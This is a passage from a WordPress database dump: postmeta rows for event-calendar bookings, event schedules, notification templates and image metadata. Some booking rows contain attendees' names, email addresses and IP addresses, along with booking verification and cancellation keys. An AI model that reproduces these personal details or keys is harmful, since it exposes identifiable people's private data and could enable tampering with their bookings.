type'),(178382,268162,'smush-complete',''),(178383,268163,'mec_transaction_id','CKL91840'),(178384,268163,'mec_user_id','1000061'),(178385,268163,'mec_verified','1'),(178386,268163,'mec_verification_key','85ffbabae0cd896ffb437ccd58075668'),(178387,268163,'mec_cancellation_key','d6371a6cb2461e03d6e880089b79044b'),(178388,268163,'mec_confirmed','1'),(178389,268163,'mec_event_id','268025'),(178390,268163,'mec_date','1678012200:1678059000'),(178391,268163,'mec_ticket_id',',1,'),(178392,268163,'mec_booking_time','2023-03-05 10:21:08'),(178393,268163,'mec_all_dates','a:0:{}'),(178394,268163,'mec_other_dates','a:0:{}'),(178395,268163,'mec_attention_time','1678012200:1678059000'),(178396,268163,'mec_attention_time_start','1678012200'),(178397,268163,'mec_attention_time_end','1678059000'),(178398,268163,'mec_book_date_submit','20230305102108'),(178399,268163,'mec_booking_location','118'),(178400,268163,'mec_ticket_price_1','0'),(178401,268163,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:11:\"Chukwuebuka\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"24.8.224.150\";}}'),(178402,268163,'mec_price','0'),(178403,268163,'mec_gateway','MEC_gateway_free'),(178404,268163,'mec_gateway_label','Free'),(178405,268164,'mec_transaction_id','THO64273'),(178406,268164,'mec_user_id','1000070'),(178407,268164,'mec_verified','1'),(178408,268164,'mec_verification_key','05045db24f518f91675d8c69987026a2'),(178409,268164,'mec_cancellation_key','d1114e9a1d1e6e235dd668b0e45bbef8'),(178410,268164,'mec_confirmed','1'),(178411,268164,'mec_event_id','268025'),(178412,268164,'mec_date','1678012200:1678059000'),(178413,268164,'mec_ticket_id',',1,'),(178414,268164,'mec_booking_time','2023-03-05 10:22:18'),(178415,268164,'mec_all_dates','a:0:{}'),(178416,268164,'mec_other_dates','a:0:{}'),(178417,268164,'mec_attention_time','1678012200:1678059000'),(178418,268164,'mec_attention_time_start','1678012200'),(178419,268164,'mec_attention_time_end','1678059000'),(178420,268164,'mec_book_date_submit','20230305102218'),(178421,268164,'mec_booking_location','118'),(178422,268164,'mec_ticket_price_1','0'),(178423,268164,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:25:\"ponyexpressmama@yahoo.com\";s:4:\"name\";s:5:\"LeAnn\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"96.61.161.103\";}}'),(178424,268164,'mec_price','0'),(178425,268164,'mec_gateway','MEC_gateway_free'),(178426,268164,'mec_gateway_label','Free'),(178427,268165,'mec_transaction_id','XWY27893'),(178428,268165,'mec_user_id','1000071'),(178429,268165,'mec_verified','1'),(178430,268165,'mec_verification_key','157f78fd219244b597c47eec82c22e57'),(178431,268165,'mec_cancellation_key','19e426f9bde0a3469bb4563c37776775'),(178432,268165,'mec_confirmed','1'),(178433,268165,'mec_event_id','268025'),(178434,268165,'mec_date','1678012200:1678059000'),(178435,268165,'mec_ticket_id',',1,'),(178436,268165,'mec_booking_time','2023-03-05 10:57:49'),(178437,268165,'mec_all_dates','a:0:{}'),(178438,268165,'mec_other_dates','a:0:{}'),(178439,268165,'mec_attention_time','1678012200:1678059000'),(178440,268165,'mec_attention_time_start','1678012200'),(178441,268165,'mec_attention_time_end','1678059000'),(178442,268165,'mec_book_date_submit','20230305105749'),(178443,268165,'mec_booking_location','118'),(178444,268165,'mec_ticket_price_1','0'),(178445,268165,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"elainedahl@yahoo.com\";s:4:\"name\";s:15:\"Elaine Dahlgren\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"97.117.70.7\";}}'),(178446,268165,'mec_price','0'),(178447,268165,'mec_gateway','MEC_gateway_free'),(178448,268165,'mec_gateway_label','Free'),(178524,268171,'mec_tickets','a:0:{}'),(178525,268171,'mec_fees_global_inheritance','1'),(178526,268171,'mec_fees','a:0:{}'),(178527,268171,'mec_ticket_variations_global_inheritance','1'),(178528,268171,'mec_ticket_variations','a:0:{}'),(178529,268171,'mec_reg_fields_global_inheritance','1'),(178530,268171,'mec_reg_fields','a:0:{}'),(178531,268171,'mec_bfixed_fields','a:0:{}'),(178532,268171,'mec_op','a:0:{}'),(178533,268171,'mec_fields','a:0:{}'),(178534,268171,'mec_event_status','EventScheduled'),(178535,268171,'mec_moved_online_link',''),(178536,268171,'mec_cancelled_reason',''),(178537,268171,'mec_display_cancellation_reason_in_single_page',''),(178538,268171,'boldgrid_hide_page_title','0'),(178539,268171,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(178540,268171,'passster_activate_global_protection',NULL),(178541,268171,'passster_activate_protection',NULL),(178542,268171,'passster_protection_type','password'),(178545,268171,'_dp_original','266104'),(178544,268171,'boldgrid_in_page_containers','1'),(178546,268171,'_edit_lock','1678248472:2'),(178547,268171,'passster_area_shortcode',''),(178548,268171,'_edit_last','2'),(178549,268171,'_thumbnail_id','266355'),(178550,268172,'_wp_attached_file','2023/03/dreaming-3.jpg'),(178551,268172,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:779;s:6:\"height\";i:438;s:4:\"file\";s:22:\"2023/03/dreaming-3.jpg\";s:8:\"filesize\";i:82106;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"dreaming-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14139;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"dreaming-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6569;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"dreaming-3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65502;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"dreaming-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20621;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"dreaming-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34814;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"dreaming-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24554;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"dreaming-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24675;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(178552,267919,'passster_area_shortcode',''),(178554,267696,'_edit_lock','1693767835:2'),(178555,267696,'passster_area_shortcode',''),(178557,268177,'protect_children',''),(178558,268177,'mec_color',''),(178559,268177,'mec_location_id','161'),(178560,268177,'mec_dont_show_map','0'),(178561,268177,'mec_organizer_id','1'),(178562,268177,'mec_read_more',''),(178563,268177,'mec_more_info',''),(178564,268177,'mec_more_info_title',''),(178565,268177,'mec_more_info_target','_self'),(178566,268177,'mec_cost',''),(178567,268177,'mec_currency','a:0:{}'),(178568,268177,'mec_additional_organizer_ids','a:0:{}'),(178569,268177,'mec_additional_location_ids','a:0:{}'),(178570,268177,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-02\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-02\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(178571,268177,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(178572,268177,'mec_certain_weekdays','a:0:{}'),(178573,268177,'mec_allday','0'),(178574,268177,'one_occurrence','0'),(178575,268177,'mec_hide_time','0'),(178576,268177,'mec_hide_end_time','0'),(178577,268177,'mec_comment',''),(178578,268177,'mec_timezone','global'),(178579,268177,'mec_countdown_method','global'),(178580,268177,'mec_public','1'),(178581,268177,'mec_start_date','2023-04-02'),(178582,268177,'mec_start_time_hour','4'),(178583,268177,'mec_start_time_minutes','0'),(178584,268177,'mec_start_time_ampm','PM'),(178585,268177,'mec_start_day_seconds','57600'),(178586,268177,'mec_end_date','2023-04-02'),(178587,268177,'mec_end_time_hour','5'),(178588,268177,'mec_end_time_minutes','30'),(178589,268177,'mec_end_time_ampm','PM'),(178590,268177,'mec_end_day_seconds','63000'),(178591,268177,'mec_repeat_status','0'),(178592,268177,'mec_repeat_type',''),(178593,268177,'mec_repeat_interval','1'),(178594,268177,'mec_repeat_end',''),(178595,268177,'mec_repeat_end_at_occurrences',''),(178596,268177,'mec_repeat_end_at_date',''),(178597,268177,'mec_advanced_days','a:0:{}'),(178598,268177,'mec_in_days',''),(178599,268177,'mec_not_in_days',''),(178600,268177,'mec_hourly_schedules','a:0:{}'),(178601,268177,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(178602,268177,'mec_tickets','a:0:{}'),(178603,268177,'mec_fees_global_inheritance','1'),(178604,268177,'mec_fees','a:0:{}'),(178605,268177,'mec_ticket_variations_global_inheritance','1'),(178606,268177,'mec_ticket_variations','a:0:{}'),(178607,268177,'mec_reg_fields_global_inheritance','1'),(178608,268177,'mec_reg_fields','a:0:{}'),(178609,268177,'mec_bfixed_fields','a:0:{}'),(178610,268177,'mec_op','a:0:{}'),(178611,268177,'mec_fields','a:0:{}'),(178612,268177,'mec_event_status','EventScheduled'),(178613,268177,'mec_moved_online_link',''),(178614,268177,'mec_cancelled_reason',''),(178615,268177,'mec_display_cancellation_reason_in_single_page',''),(178616,268177,'boldgrid_hide_page_title','0'),(178617,268177,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(178618,268177,'passster_activate_global_protection',NULL),(178619,268177,'passster_activate_protection',NULL),(178620,268177,'passster_protection_type','password'),(178624,268177,'_dp_original','266104'),(178622,268177,'boldgrid_in_page_containers','1'),(178623,268177,'passster_area_shortcode',''),(178625,268177,'_edit_lock','1693156629:2'),(178626,268177,'_edit_last','15'),(178627,268177,'_thumbnail_id','268030'),(178628,268178,'protect_children',''),(178629,268178,'mec_color',''),(178630,268178,'mec_location_id','161'),(178631,268178,'mec_dont_show_map','0'),(178632,268178,'mec_organizer_id','1'),(178633,268178,'mec_read_more',''),(178634,268178,'mec_more_info',''),(178635,268178,'mec_more_info_title',''),(178636,268178,'mec_more_info_target','_self'),(178637,268178,'mec_cost',''),(178638,268178,'mec_currency','a:0:{}'),(178639,268178,'mec_additional_organizer_ids','a:0:{}'),(178640,268178,'mec_additional_location_ids','a:0:{}'),(178641,268178,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-03-19\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-03-19\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(178642,268178,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(178643,268178,'mec_certain_weekdays','a:0:{}'),(178644,268178,'mec_allday','0'),(178645,268178,'one_occurrence','0'),(178646,268178,'mec_hide_time','0'),(178647,268178,'mec_hide_end_time','0'),(178648,268178,'mec_comment',''),(178649,268178,'mec_timezone','global'),(178650,268178,'mec_countdown_method','global'),(178651,268178,'mec_public','1'),(178652,268178,'mec_start_date','2023-03-19'),(178653,268178,'mec_start_time_hour','4'),(178654,268178,'mec_start_time_minutes','0'),(178655,268178,'mec_start_time_ampm','PM'),(178656,268178,'mec_start_day_seconds','57600'),(178657,268178,'mec_end_date','2023-03-19'),(178658,268178,'mec_end_time_hour','5'),(178659,268178,'mec_end_time_minutes','30'),(178660,268178,'mec_end_time_ampm','PM'),(178661,268178,'mec_end_day_seconds','63000'),(178662,268178,'mec_repeat_status','0'),(178663,268178,'mec_repeat_type',''),(178664,268178,'mec_repeat_interval','1'),(178665,268178,'mec_repeat_end',''),(178666,268178,'mec_repeat_end_at_occurrences',''),(178667,268178,'mec_repeat_end_at_date',''),(178668,268178,'mec_advanced_days','a:0:{}'),(178669,268178,'mec_in_days',''),(178670,268178,'mec_not_in_days',''),(178671,268178,'mec_hourly_schedules','a:0:{}'),(178672,268178,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(178673,268178,'mec_tickets','a:0:{}'),(178674,268178,'mec_fees_global_inheritance','1'),(178675,268178,'mec_fees','a:0:{}'),(178676,268178,'mec_ticket_variations_global_inheritance','1'),(178677,268178,'mec_ticket_variations','a:0:{}'),(178678,268178,'mec_reg_fields_global_inheritance','1'),(178679,268178,'mec_reg_fields','a:0:{}'),(178680,268178,'mec_bfixed_fields','a:0:{}'),(178681,268178,'mec_op','a:0:{}'),(178682,268178,'mec_fields','a:0:{}'),(178683,268178,'mec_event_status','EventScheduled'),(178684,268178,'mec_moved_online_link',''),(178685,268178,'mec_cancelled_reason',''),(178686,268178,'mec_display_cancellation_reason_in_single_page',''),(178687,268178,'boldgrid_hide_page_title','0'),(178688,268178,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(178689,268178,'passster_activate_global_protection',NULL),(178690,268178,'passster_activate_protection',NULL),(178691,268178,'passster_protection_type','password'),(178692,268178,'boldgrid_in_page_containers','1'),(178693,268178,'passster_area_shortcode',''),(178696,268178,'_dp_original','268177'),(178695,268178,'_thumbnail_id','268162'),(178697,268178,'_edit_lock','1678411338:15'),(178698,268178,'_edit_last','15'),(178699,268179,'protect_children',''),(178700,268179,'mec_color',''),(178701,268179,'mec_location_id','170'),(178702,268179,'mec_dont_show_map','0'),(178703,268179,'mec_organizer_id','1'),(178704,268179,'mec_read_more',''),(178705,268179,'mec_more_info',''),(178706,268179,'mec_more_info_title',''),(178707,268179,'mec_more_info_target','_self'),(178708,268179,'mec_cost',''),(178709,268179,'mec_currency','a:0:{}'),(178710,268179,'mec_additional_organizer_ids','a:0:{}'),(178711,268179,'mec_additional_location_ids','a:0:{}'),(178712,268179,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-12\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-12\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(178713,268179,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(178714,268179,'mec_certain_weekdays','a:0:{}'),(178715,268179,'mec_allday','0'),(178716,268179,'one_occurrence','0'),(178717,268179,'mec_hide_time','0'),(178718,268179,'mec_hide_end_time','0'),(178719,268179,'mec_comment',''),(178720,268179,'mec_timezone','global'),(178721,268179,'mec_countdown_method','global'),(178722,268179,'mec_public','1'),(178723,268179,'mec_start_date','2023-04-12'),(178724,268179,'mec_start_time_hour','6'),(178725,268179,'mec_start_time_minutes','30'),(178726,268179,'mec_start_time_ampm','PM'),(178727,268179,'mec_start_day_seconds','66600'),(178728,268179,'mec_end_date','2023-04-12'),(178729,268179,'mec_end_time_hour','7'),(178730,268179,'mec_end_time_minutes','30'),(178731,268179,'mec_end_time_ampm','PM'),(178732,268179,'mec_end_day_seconds','70200'),(178733,268179,'mec_repeat_status','0'),(178734,268179,'mec_repeat_type',''),(178735,268179,'mec_repeat_interval','1'),(178736,268179,'mec_repeat_end',''),(178737,268179,'mec_repeat_end_at_occurrences',''),(178738,268179,'mec_repeat_end_at_date',''),(178739,268179,'mec_advanced_days','a:0:{}'),(178740,268179,'mec_in_days',''),(178741,268179,'mec_not_in_days',''),(178742,268179,'mec_hourly_schedules','a:0:{}'),(178743,268179,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(178744,268179,'mec_tickets','a:0:{}'),(178745,268179,'mec_fees_global_inheritance','1'),(178746,268179,'mec_fees','a:0:{}'),(178747,268179,'mec_ticket_variations_global_inheritance','1'),(178748,268179,'mec_ticket_variations','a:0:{}'),(178749,268179,'mec_reg_fields_global_inheritance','1'),(178750,268179,'mec_reg_fields','a:0:{}'),(178751,268179,'mec_bfixed_fields','a:0:{}'),(178752,268179,'mec_op','a:0:{}'),(178753,268179,'mec_fields','a:0:{}'),(178754,268179,'mec_event_status','EventScheduled'),(178755,268179,'mec_moved_online_link',''),(178756,268179,'mec_cancelled_reason',''),(178757,268179,'mec_display_cancellation_reason_in_single_page',''),(178758,268179,'boldgrid_hide_page_title','0'),(178759,268179,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(178760,268179,'passster_activate_global_protection',NULL),(178761,268179,'passster_activate_protection',NULL),(178762,268179,'passster_protection_type','password'),(178763,268179,'boldgrid_in_page_containers','1'),(178764,268179,'passster_area_shortcode',''),(178765,268179,'_thumbnail_id','268180'),(178767,268179,'_dp_original','268178'),(178768,268179,'_edit_lock','1678411615:15'),(178769,268179,'_edit_last','15'),(178770,268180,'_wp_attached_file','2023/03/GoldenWorldPerson.webp'),(178771,268180,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:30:\"2023/03/GoldenWorldPerson.webp\";s:8:\"filesize\";i:28704;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"GoldenWorldPerson-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11470;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"GoldenWorldPerson-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5254;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:30:\"GoldenWorldPerson-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12564;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:30:\"GoldenWorldPerson-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19936;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:30:\"GoldenWorldPerson-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15880;}s:8:\"tileview\";a:5:{s:4:\"file\";s:30:\"GoldenWorldPerson-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14780;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(178772,268181,'protect_children',''),(178773,268181,'mec_color',''),(178774,268181,'mec_location_id','161'),(178775,268181,'mec_dont_show_map','0'),(178776,268181,'mec_organizer_id','1'),(178777,268181,'mec_read_more',''),(178778,268181,'mec_more_info',''),(178779,268181,'mec_more_info_title',''),(178780,268181,'mec_more_info_target','_self'),(178781,268181,'mec_cost',''),(178782,268181,'mec_currency','a:0:{}'),(178783,268181,'mec_additional_organizer_ids','a:0:{}'),(178784,268181,'mec_additional_location_ids','a:0:{}'),(178785,268181,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-23\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-23\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(178786,268181,'mec_